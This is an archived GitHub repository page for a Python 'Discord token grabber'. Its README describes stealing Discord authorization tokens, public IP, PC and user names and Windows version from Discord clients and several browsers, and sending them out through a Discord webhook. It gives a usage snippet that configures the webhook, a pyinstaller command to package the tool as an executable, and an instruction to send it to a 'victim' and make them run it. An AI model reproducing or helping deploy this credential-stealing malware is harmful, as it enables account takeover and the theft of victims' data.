Skip to content
This repository has been archived by the owner on Aug 5, 2022. It is now read-only.

MegaTheTeapot/Discord_token_grabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

42 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Warning The method of grabbing tokens no longer works hence im archiving the repo. I will not update this.

Discord Token Grabber

A Discord token grabber written in Python 3.

visitor badge wakatime

This version of the grabber only supports Windows.

Features

  • Transfers via Discord webhook
  • Sends: Public IP, PCName, PCUserName, Windows Version, Discord username, descriminator , token
  • Searches for authorization tokens in multiple directories (Discord, Discord PTB, Discord Canary, Google chrome, Opera, Brave and Yandex)
  • Only requests library needed
  • Can be used as a library

Example Message

fancy
example

How to use

  1. Create a webhook on your Discord server.

2. add it to another script (preferably as a library)

example:

import token_stealer
token_stealer.WEBHOOK_URL = "https://discord.com/api/webhooks/123456789/fyugYDStygft2g7y8f6datyFTYydfg61hfTY78y"
token_stealer.PING_ME = True
token_stealer.SEND_IP = True
token_stealer.SEND_PC_INFO = True
token_stealer.fancy()

2.75. Compile the script using pyinstaller (optional but recomended)

pyinstaller --onefile --console --name "program_name_here" --no-embed-manifest --add-data "C:/path/to/project/token_stealer.py;."  "C:/path/to/project/your_script.py"
  1. Send the script to your victim and make them run it.

Changelog:

- some fixes

Readme Card